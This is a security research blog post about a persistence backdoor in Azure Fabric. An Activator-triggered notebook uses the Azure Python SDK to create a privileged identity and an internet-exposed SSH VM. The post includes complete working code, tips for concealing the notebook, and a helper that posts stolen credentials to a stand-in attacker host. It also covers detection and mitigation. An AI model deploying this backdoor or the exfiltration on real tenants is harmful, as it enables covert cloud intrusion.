
Azure Fabric Backdoor With A Twist

by Viktor Gazdag

21 October 2025

Intro 

This blog post discusses the creation of backdoor access in Azure Fabric, previously presented in Las Vegas at the DefCon 33 conference within the Cloud Village by Viktor Gazdag, Principal Security Consultant at NCC Group.

A video of the talk can be viewed here:

Azure Fabric is a SaaS-based, end-to-end analytics platform that unifies tools and services such as Power BI, Data Lakehouse, data pipelines, Data Warehouse, Data Factory, databases, etc. into one portal. The main function of the platform is to ingest and process data, with engineers applying arbitrary code to that data, and then to build reports from it.

Proof of Concept Backdoor 

Since the platform is designed for automated data manipulation that requires code execution, there are naturally multiple ways to execute code. These include pipelines, user-defined functions, Spark jobs and notebooks. To introduce another angle, and to delay code execution in order to conceal presence, a combination of a notebook and Activator is used to run Python code that creates the backdoor access.

Activator is an event detection and monitoring engine in Fabric that can automatically trigger actions when a condition is met. This service monitors workspace events, such as an item being successfully created or updated. There are additional Fabric events such as Job events, OneLake events and Azure Blob Storage events, but the proof-of-concept (PoC) backdoor specifically looks for workspace events that happen in one workspace.

A notebook is an interactive, web-based environment that supports different programming languages for data exploration, analysis and transformation. One of the supported languages is Python. In addition, central public package repositories are also supported. The Azure Python SDK is available in the public repository and helps simplify the amount of code that is required to execute the post-exploitation steps. It is used to log in as a service principal with the Owner role on a resource group and to manage resources in the Azure subscription. The activities include the creation of another service principal, a virtual machine with a public IP address and an assigned managed identity, plus a network security group allowing SSH from the Internet.

The PoC does not hide any of the code or the output; instead, it prints out the virtual machine IP address, the administrator username with password and the managed identity name. The notebook allows hiding the input and output of the code, but with a click these can be easily revealed. One method to further hide the content is to create a package in wheel format from the code and upload it as a custom Python package that can be installed and then called within the notebook. Instead of printing the results in the logs, data can be sent to a controlled web server, as sketched below.
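As an illustration of the last point, the print statements could be replaced with a small helper that posts the results to a controlled web server. This is a minimal sketch and not part of the original PoC; the URL is a placeholder, and it assumes the requests package is available in the notebook environment (or installed the same way as the SDK packages):

import requests

def report_results(vm_ip, vm_username, vm_password, identity_name):
    """Send the backdoor details to a controlled web server instead of printing them."""
    payload = {
        "ip": vm_ip,
        "user": vm_username,
        "password": vm_password,
        "managed_identity": identity_name,
    }
    # https://attacker.example is a placeholder for the controlled web server
    requests.post("https://attacker.example/collect", json=payload, timeout=10)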

By default, the notebook runs in the name of the user. If you want to use a managed identity or service principal, you have to enable and configure it; Fabric then takes care of the managed identity and its lifecycle. That means that if you want to access and modify resources outside of Fabric, your user or managed identity requires additional permissions as well.

The next sections discuss the components of the backdoor and some of the details of how to use the Azure Python SDK and what it is doing.

Components of The Backdoor 

The service principal component is not strictly part of the backdoor, as it lives outside of Fabric, but it is required to create the virtual machine and the other resources. You can look for and reuse existing service principals if they have the necessary permissions to create the resources you want, as sketched below. In this case, the service principal has the Owner role on the resource group itself.
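A minimal sketch of such a reuse check, using the azure-mgmt-authorization package that also appears later in the post; the principal_object_id value is a hypothetical placeholder for the service principal's object ID, and the role assignments returned for the resource group scope show which roles it already holds there:

import os
from azure.identity import ClientSecretCredential
from azure.mgmt.authorization import AuthorizationManagementClient

credential = ClientSecretCredential(
    tenant_id=os.environ["AZURE_TENANT_ID"],
    client_id=os.environ["AZURE_CLIENT_ID"],
    client_secret=os.environ["AZURE_CLIENT_SECRET"],
)
subscription_id = os.environ["AZURE_SUBSCRIPTION_ID"]
resource_group_name = os.environ["AZURE_RESOURCE_GROUP"]
auth_client = AuthorizationManagementClient(credential, subscription_id)

scope = f"/subscriptions/{subscription_id}/resourceGroups/{resource_group_name}"
principal_object_id = "00000000-0000-0000-0000-000000000000"  # placeholder object ID
# List the role assignments held by this principal at the resource group scope
for assignment in auth_client.role_assignments.list_for_scope(
    scope, filter=f"principalId eq '{principal_object_id}'"
):
    # The role definition ID ends with the role's GUID (e.g. Owner or Contributor)
    print(assignment.role_definition_id)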

It is possible to use an already available notebook that runs Azure Python SDK code and just add the backdoor code to it, or to create a new one and bury it deep down in a folder structure. By default, the notebook runs in the name of the user who created it. That is the reason the code uses a service principal with a role.

The code executed in the notebook uses Python and the Azure Python SDK. It creates the following resources in an existing resource group: virtual network, subnet, network interface, virtual machine with the Ubuntu Linux operating system, operating system login credentials for the virtual machine, disk, network security group, managed identity and service principal. It also registers resource providers if it is the first time the service is used (a polling sketch follows below). Some of the functions also require waiting for the operation to finish, otherwise an exception is raised. Furthermore, it assigns the Contributor role to both the managed identity and the service principal. A later section discusses more details with code examples to help understand how to use the SDK.
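The provider registration in the PoC does not wait for completion (the Appendix A code only notes that polling may be needed). A minimal sketch of such polling, assuming the same ResourceManagementClient; the 10-second interval and 300-second timeout are arbitrary choices:

import time

def wait_for_provider(resource_client, namespace, timeout=300):
    """Register a resource provider and poll until its state becomes 'Registered'."""
    resource_client.providers.register(namespace)
    deadline = time.time() + timeout
    while time.time() < deadline:
        provider = resource_client.providers.get(namespace)
        if provider.registration_state == "Registered":
            return provider
        time.sleep(10)  # arbitrary polling interval
    raise TimeoutError(f"Provider {namespace} did not register within {timeout} seconds")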

Activator is used for event monitoring and action execution. It looks for specific events and, if they happened, triggers an action. The action can be sending an email, running a notebook or executing a Power Automate flow. It is also worth mentioning that at the time of the research there was at least a 30-minute delay (based on observation) between an item being created and the event showing up in the Activator monitoring menu. For the PoC, we use all the workspace event items that happen in one specific workspace, and the action executes a notebook containing the backdoor code.

Lastly, permissions. The Contributor role on the workspace is the minimum permission required to create an Activator. Any additional Entra ID or Azure permissions depend on the activities that the code performs (key vault access, storage access, turning off logging, etc.). In this case, the Owner role at the resource group level is required for the service principal, as user management and role assignment are performed.

Usage of Azure Python SDK 

In this section, some parts of the code are discussed to help understand what to do and how to do it. The complete source code of the PoC is available at the end of the article. It is also worth noting that the PoC code was generated using a large language model (LLM) tool (Microsoft CoPilot) through several iterations and was tested in an Azure test environment.

The Azure Python SDK helps with creating and managing resources in Azure. One of the packages is Azure Identity, which helps with Entra ID authentication. Other packages from the SDK, such as azure-mgmt-compute or azure-mgmt-network, make it easier to create resources such as a virtual machine, virtual disk or network security group.

The following Azure Python SDK packages are installed with the !pip3 install command. This installs the Python packages locally in the environment by opening an operating system shell:

!pip3 install azure-mgmt-msi 
!pip3 install azure-mgmt-authorization 
!pip3 install msrest 
!pip3 install azure-mgmt-common 
!pip3 install azure-mgmt-nspkg 
!pip3 install azure-mgmt-compute 
!pip3 install azure-mgmt-resource 
!pip3 install azure-mgmt-network 
!pip3 install azure-identity  

Then the classes are imported that will be used to create the various resources in Azure and Entra ID:

 
from azure.identity import ClientSecretCredential 
from azure.mgmt.msi import ManagedServiceIdentityClient 
from azure.mgmt.resource import ResourceManagementClient 
from azure.mgmt.compute import ComputeManagementClient 
from azure.mgmt.network import NetworkManagementClient 
from azure.mgmt.authorization import AuthorizationManagementClient 
from azure.mgmt.authorization.models import RoleAssignmentCreateParameters 
from azure.core.exceptions import HttpResponseError  

As an example, the azure.identity package is used for creating the login credentials, while the azure.mgmt.compute package is responsible for creating the virtual machine resource.

The ClientSecretCredential class is used for creating the login credential object to log in with a service principal. This is important, because a different class is used for user login.

 
credential = ClientSecretCredential(
    tenant_id=tenant_id,
    client_id=client_id,
    client_secret=client_secret
)
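For comparison, a user (interactive) sign-in would use a different credential class from the same azure-identity package. A minimal sketch; both classes start an interactive sign-in flow when a token is requested, instead of taking a client secret:

from azure.identity import InteractiveBrowserCredential, DeviceCodeCredential

# Opens a browser window for the user to sign in when a token is requested
user_credential = InteractiveBrowserCredential()

# Or, when a token is requested, prints a device code for the user to enter at the
# Microsoft device login page, which is useful where no local browser is available
user_credential = DeviceCodeCredential()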

The values for each property are taken from environment variables in the operating system, which are set like this:

 
os.environ["AZURE_TENANT_ID"] = "TenantID" 
os.environ["AZURE_CLIENT_ID"] = "ClientID" 
os.environ["AZURE_CLIENT_SECRET"] = "Secret" 

The credential object is then used in the different Azure management clients, such as compute, network or managed identity, to create the resources themselves. The following code snippet is an example of using an existing resource group, or creating it if it does not exist:

 
def create_resource_group(resource_client, resource_group_name, location):
    """Create a resource group if it doesn't exist."""
    try:
        rg = resource_client.resource_groups.get(resource_group_name)
        print(f"Using existing resource group: {resource_group_name}")
        return rg
    except HttpResponseError:
        print(f"Creating resource group: {resource_group_name}")
        return resource_client.resource_groups.create_or_update(
            resource_group_name,
            {"location": location}
        )
The following code snippet shows how the network_client from the Azure Python SDK creates a network security group that allows SSH connections from anywhere on the Internet, if the group does not already exist:

 
def create_nsg(network_client, resource_group_name, location, nsg_name):
    """Create network security group with SSH access from the internet."""
    try:
        nsg = network_client.network_security_groups.get(resource_group_name, nsg_name)
        print(f"Using existing NSG: {nsg_name}")
        return nsg
    except HttpResponseError:
        print(f"Creating NSG: {nsg_name} with SSH access rule")
        nsg_params = {
            'location': location,
            'security_rules': [
                {
                    'name': 'AllowSSH',
                    'protocol': 'Tcp',
                    'source_port_range': '*',
                    'destination_port_range': '22',
                    'source_address_prefix': '*',  # Allow from any source (internet)
                    'destination_address_prefix': '*',
                    'access': 'Allow',
                    'priority': 100,
                    'direction': 'Inbound',
                    'description': 'Allow SSH access from the internet'
                }
            ]
        }
        return network_client.network_security_groups.begin_create_or_update(
            resource_group_name,
            nsg_name,
            nsg_params
        ).result()

Traces Left Behind

Even though the backdoor can be hidden well in the notebook or in a new Spark environment, there are still traces of its activity left behind. The notebook has a history log of runs, which shows when it ran and what the output of the executed code was. In addition, every notebook has a resource explorer, which makes the additional third-party packages visible.
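Run history can also be pulled programmatically. The following is a rough sketch only: the Fabric REST API endpoint for listing item job instances and the token scope are assumptions based on the public documentation and should be verified, and workspace_id and notebook_id are placeholders:

import requests
from azure.identity import InteractiveBrowserCredential

# Assumed token scope for the Fabric REST API; verify against current documentation
token = InteractiveBrowserCredential().get_token("https://api.fabric.microsoft.com/.default").token
workspace_id = "<workspace-guid>"      # placeholder
notebook_id = "<notebook-item-guid>"   # placeholder

# Assumed endpoint: list the job instances (runs) of one item in a workspace
resp = requests.get(
    f"https://api.fabric.microsoft.com/v1/workspaces/{workspace_id}/items/{notebook_id}/jobs/instances",
    headers={"Authorization": f"Bearer {token}"},
    timeout=30,
)
for run in resp.json().get("value", []):
    # Each entry describes one run with its status and start/end times
    print(run.get("status"), run.get("startTimeUtc"), run.get("endTimeUtc"))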

Spark environments have a configurable custom library section where you can see the uploaded third-party packages, and this should be reviewed periodically. The same periodic review applies to all of the Activator's actions. Although there is evidence that an Activator was changed or created, the event name does not explicitly say so.

Reviewing and monitoring IAM access and role assignments at the subscription and resource group level is a security best practice. This also means that service principals are periodically reviewed to confirm they have the correct permissions and roles.
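A minimal sketch of such a review using the same azure-mgmt-authorization package as the PoC, here at the subscription scope (list_for_scope accepts a resource group scope in the same way); DefaultAzureCredential and the subscription ID placeholder are assumptions for the reviewer's environment:

from azure.identity import DefaultAzureCredential
from azure.mgmt.authorization import AuthorizationManagementClient

subscription_id = "your-subscription-id"  # placeholder
credential = DefaultAzureCredential()
auth_client = AuthorizationManagementClient(credential, subscription_id)

# Enumerate every role assignment visible at the subscription scope
for assignment in auth_client.role_assignments.list_for_scope(f"/subscriptions/{subscription_id}"):
    # Who (principal_id) holds which role (role_definition_id) at which scope
    print(assignment.principal_id, assignment.role_definition_id, assignment.scope)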

The Entra ID log contains the creation, modification and sign-in events of the service principals. This log can also be used in SIEM solutions to alert on any unauthorized modification or login.

Useful Fabric Settings 

There are two tenant-level and one workspace-level settings that can help and make an attacker's life harder, including in the post-exploitation phase. These are the "Blocking Internet access", "Private links for Azure Fabric" and "Workspace outbound access protection" options. The first one blocks all access from the Internet, while the second uses private endpoints for service communications. The last option blocks Internet access at the workspace level, which cuts off Internet access from notebooks, Spark job definitions, environments, shortcuts and lakehouses.

Conclusion 

The Azure Python SDK is a useful collection of packages that can be used not just for legitimate automation, but also for malicious activities. Post-exploitation activities that use built-in tools like the SDK or a notebook can be harder to catch, as they look like legitimate activities and use cases, especially if execution is delayed as in this blog post.

Appendix A – Complete Code of Azure Fabric Backdoor

#!/usr/bin/env python

 

import os 
import random 
import string 
from datetime import datetime, timedelta 


from azure.identity import ClientSecretCredential 
from azure.mgmt.msi import ManagedServiceIdentityClient 
from azure.mgmt.resource import ResourceManagementClient 
from azure.mgmt.compute import ComputeManagementClient 
from azure.mgmt.network import NetworkManagementClient 
from azure.mgmt.authorization import AuthorizationManagementClient 
from azure.mgmt.authorization.models import RoleAssignmentCreateParameters 
from azure.core.exceptions import HttpResponseError 


# Service Principal credentials 

os.environ["AZURE_TENANT_ID"] = "TenantID" 
os.environ["AZURE_CLIENT_ID"] = "ClientID" 
os.environ["AZURE_CLIENT_SECRET"] = "Secret" 
os.environ["AZURE_SUBSCRIPTION_ID"] = "SubscriptionID" 
os.environ["AZURE_RESOURCE_GROUP"] = "ResourceGroupName" 
tenant_id = os.environ.get("AZURE_TENANT_ID", "your-tenant-id") 
client_id = os.environ.get("AZURE_CLIENT_ID", "your-client-id") 
client_secret = os.environ.get("AZURE_CLIENT_SECRET", "your-client-secret") 

 
# Azure configuration 

subscription_id = os.environ.get("AZURE_SUBSCRIPTION_ID", "your-subscription-id") 
location = "eastus" 
resource_group_name = "Fabric2" 
 

# VM configuration 

vm_name = "linux-demo-vm" 
vm_username = "azureuser" 
vm_password = "".join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(16)) 
managed_identity_name = "demo-msi" 


# Role definition ID for Contributor role 

contributor_role_id = "b24988ac-6180-42a0-ab88-20f7382dd24c" 
 

def main(): 

    # Create client credential 
    credential = ClientSecretCredential( 

        tenant_id=tenant_id, 
        client_id=client_id, 
        client_secret=client_secret 

    ) 

     
    # Create clients 

    resource_client = ResourceManagementClient(credential, subscription_id) 
    msi_client = ManagedServiceIdentityClient(credential, subscription_id) 
    compute_client = ComputeManagementClient(credential, subscription_id) 
    network_client = NetworkManagementClient(credential, subscription_id) 
    auth_client = AuthorizationManagementClient(credential, subscription_id) 

     
    # Register required resource providers 

    register_providers(resource_client) 

     
    # Create or check resource group 

    create_resource_group(resource_client, resource_group_name, location) 
     

    # Create managed identity 

    identity = create_managed_identity(msi_client, resource_group_name, managed_identity_name, location) 
    print(f"Created managed identity: {identity.name} with ID: {identity.id}") 

     
    # Assign Contributor role to the managed identity 

    role_assignment = assign_role( 

        auth_client, 
        identity.principal_id, 
        contributor_role_id, 

        f"/subscriptions/{subscription_id}/resourceGroups/{resource_group_name}" 

    ) 

    print(f"Assigned Contributor role to managed identity") 

     
    # Create network resources 

    vnet_name = f"{vm_name}-vnet" 
    subnet_name = "default" 
    nic_name = f"{vm_name}-nic" 
    ip_name = f"{vm_name}-ip" 
    nsg_name = f"{vm_name}-nsg" 


    vnet, subnet = create_vnet(network_client, resource_group_name, location, vnet_name, subnet_name) 
    nsg = create_nsg(network_client, resource_group_name, location, nsg_name) 
    nic = create_nic(network_client, resource_group_name, location, nic_name, subnet.id, ip_name) 

     

    # Create Linux VM with managed identity 

    vm = create_linux_vm( 
        compute_client, 
        resource_group_name, 
        location, 
        vm_name, 
        nic.id, 
        vm_username, 
        vm_password, 
        identity.id 

    ) 

     

    # Get the public IP address for SSH access 

    ip_info = network_client.public_ip_addresses.get(resource_group_name, ip_name) 

     
    print("\n" + "="*50) 
    print(f"DEPLOYMENT COMPLETED SUCCESSFULLY") 
    print("="*50) 
    print(f"VM Name: {vm_name}") 
    print(f"Username: {vm_username}") 
    print(f"Password: {vm_password}")  # In production, use a more secure way to handle passwords 
    print(f"SSH Command: ssh {vm_username}@{ip_info.ip_address}") 
    print(f"Managed Identity: {managed_identity_name}") 
    print("="*50) 

 

 
def register_providers(resource_client): 

    """Register necessary Azure resource providers.""" 
    providers_to_register = [ 

        "Microsoft.ManagedIdentity", 
        "Microsoft.Compute", 
        "Microsoft.Network", 
        "Microsoft.Authorization" 

    ] 

     
    for provider in providers_to_register: 

        print(f"Registering provider: {provider}") 
        resource_client.providers.register(provider) 
        # Note: Registration can take time to complete. In a production scenario, 
        # you might want to poll for completion. 

 


def create_resource_group(resource_client, resource_group_name, location): 

    """Create a resource group if it doesn't exist.""" 

    try: 

        rg = resource_client.resource_groups.get(resource_group_name) 
        print(f"Using existing resource group: {resource_group_name}") 
        return rg 

    except HttpResponseError: 

        print(f"Creating resource group: {resource_group_name}") 
        return resource_client.resource_groups.create_or_update( 

            resource_group_name, 

            {"location": location} 

        ) 

 

 
def create_managed_identity(msi_client, resource_group_name, identity_name, location): 

    """Create a user-assigned managed identity.""" 

    try: 

        return msi_client.user_assigned_identities.get(resource_group_name, identity_name) 

    except HttpResponseError: 

        # Create the managed identity 
        identity = msi_client.user_assigned_identities.create_or_update( 

            resource_group_name, 
            identity_name, 
            {"location": location} 

        ) 

         
        # Add a small delay to allow for replication 
        print("Waiting for managed identity to propagate...") 
        import time 
        time.sleep(30)  # Wait 30 seconds for replication 

         

        return identity 

 


def assign_role(auth_client, principal_id, role_definition_id, scope): 

    """Assign role to the managed identity.""" 
    # Derive the role assignment name from the principal ID; truncating to 36
    # characters yields the principal's GUID, which is a valid assignment name
    role_assignment_name = f"{principal_id}-{role_definition_id}"[:36] 

     

    role_assignment_params = RoleAssignmentCreateParameters( 

        role_definition_id=f"/subscriptions/{subscription_id}/providers/Microsoft.Authorization/roleDefinitions/{role_definition_id}", 
        principal_id=principal_id, 
        principal_type="ServicePrincipal"  # Specify principal type to avoid replication delay issues 

    ) 

     

    try: 

        return auth_client.role_assignments.create( 

            scope=scope, 
            role_assignment_name=role_assignment_name, 
            parameters=role_assignment_params 

        ) 

    except HttpResponseError as e: 

        # If role assignment already exists, continue 
        if "already exists" in str(e): 

            print(f"Role assignment already exists for principal {principal_id}") 

            return None 

        raise 

 
 

def create_vnet(network_client, resource_group_name, location, vnet_name, subnet_name): 

    """Create virtual network and subnet.""" 

    try: 

        vnet = network_client.virtual_networks.get(resource_group_name, vnet_name) 
        subnet = network_client.subnets.get(resource_group_name, vnet_name, subnet_name) 
        print(f"Using existing vnet: {vnet_name} and subnet: {subnet_name}") 

        return vnet, subnet 

    except HttpResponseError: 

        print(f"Creating vnet: {vnet_name} and subnet: {subnet_name}") 
        vnet_params = { 

            'location': location, 
            'address_space': { 

                'address_prefixes': ['10.0.0.0/16'] 

            }, 

            'subnets': [ 

                { 

                    'name': subnet_name, 
                    'address_prefix': '10.0.0.0/24' 

                } 

            ] 

        } 

         

        vnet = network_client.virtual_networks.begin_create_or_update( 

            resource_group_name, 
            vnet_name, 
            vnet_params 

        ).result() 

         

        subnet = network_client.subnets.get( 

            resource_group_name, 
            vnet_name, 
            subnet_name 

        ) 

         

        return vnet, subnet 

 

 
def create_nsg(network_client, resource_group_name, location, nsg_name): 

    """Create network security group with SSH access from the internet.""" 

    try: 

        nsg = network_client.network_security_groups.get(resource_group_name, nsg_name) 
        print(f"Using existing NSG: {nsg_name}") 
        return nsg 

    except HttpResponseError: 

        print(f"Creating NSG: {nsg_name} with SSH access rule") 
        nsg_params = { 

            'location': location, 
            'security_rules': [ 

                { 

                    'name': 'AllowSSH', 
                    'protocol': 'Tcp', 
                    'source_port_range': '*', 
                    'destination_port_range': '22', 
                    'source_address_prefix': '*',  # Allow from any source (internet) 
                    'destination_address_prefix': '*', 
                    'access': 'Allow', 
                    'priority': 100, 
                    'direction': 'Inbound', 
                    'description': 'Allow SSH access from the internet' 

                } 

            ] 

        } 

         

        return network_client.network_security_groups.begin_create_or_update( 

            resource_group_name, 
            nsg_name, 
            nsg_params 

        ).result() 

 

 
def create_nic(network_client, resource_group_name, location, nic_name, subnet_id, ip_name): 

    """Create network interface with public IP and associate with NSG.""" 

    try: 

        nic = network_client.network_interfaces.get(resource_group_name, nic_name) 
        print(f"Using existing NIC: {nic_name}") 
        return nic 

    except HttpResponseError: 

        print(f"Creating NIC: {nic_name} with public IP: {ip_name}") 

         

        # Create public IP 
        public_ip_params = { 

            'location': location, 
            'sku': { 

                'name': 'Standard' 

            }, 

            'public_ip_allocation_method': 'Static', 
            'public_ip_address_version': 'IPv4' 

        } 

         

        public_ip = network_client.public_ip_addresses.begin_create_or_update( 

            resource_group_name, 
            ip_name, 
            public_ip_params 

        ).result() 


        # Get NSG 

        nsg_name = f"{vm_name}-nsg" 

        try: 

            nsg = network_client.network_security_groups.get(resource_group_name, nsg_name) 

        except HttpResponseError: 

            # Create NSG if it doesn't exist 

            nsg = create_nsg(network_client, resource_group_name, location, nsg_name) 

         

        # Create NIC with NSG associated 

        nic_params = { 

            'location': location, 
            'ip_configurations': [ 

                { 

                    'name': 'ipconfig1', 
                    'subnet': { 

                        'id': subnet_id 

                    }, 

                    'public_ip_address': { 

                        'id': public_ip.id 

                    } 

                } 

            ], 

            'network_security_group': { 

                'id': nsg.id 

            } 

        } 

         

        nic = network_client.network_interfaces.begin_create_or_update( 

            resource_group_name, 
            nic_name, 
            nic_params 

        ).result() 

         

        # Once NIC is created, print the public IP address for SSH access 

        ip_info = network_client.public_ip_addresses.get(resource_group_name, ip_name) 
        print(f"VM will be accessible via SSH at: {ip_info.ip_address}") 
         

        return nic 

 

 
def create_linux_vm(compute_client, resource_group_name, location, vm_name, nic_id,  

                    admin_username, admin_password, identity_id): 

    """Create a Linux virtual machine with a managed identity attached.""" 
    print(f"Creating VM: {vm_name}") 

     

    vm_params = { 

        'location': location, 
        'os_profile': { 

            'computer_name': vm_name, 
            'admin_username': admin_username, 
            'admin_password': admin_password, 
            'linux_configuration': { 

                'disable_password_authentication': False 

            } 

        }, 

        'hardware_profile': { 

            'vm_size': 'Standard_DS1_v2' 

        }, 

        'storage_profile': { 

            'image_reference': { 

                'publisher': 'Canonical', 
                'offer': 'UbuntuServer', 
                'sku': '18.04-LTS', 
                'version': 'latest' 

            }, 

            'os_disk': { 

                'create_option': 'FromImage', 
                'managed_disk': { 

                    'storage_account_type': 'Premium_LRS' 

                } 

            } 

        }, 

        'network_profile': { 

            'network_interfaces': [ 

                { 

                    'id': nic_id, 
                    'primary': True 

                } 

            ] 

        }, 

        'identity': { 

            'type': 'UserAssigned', 
            'user_assigned_identities': { 

                identity_id: {} 

            } 

        } 

    } 

     

    return compute_client.virtual_machines.begin_create_or_update( 

        resource_group_name, 
        vm_name, 
        vm_params 

    ).result() 

 

 
if __name__ == "__main__": 
    main()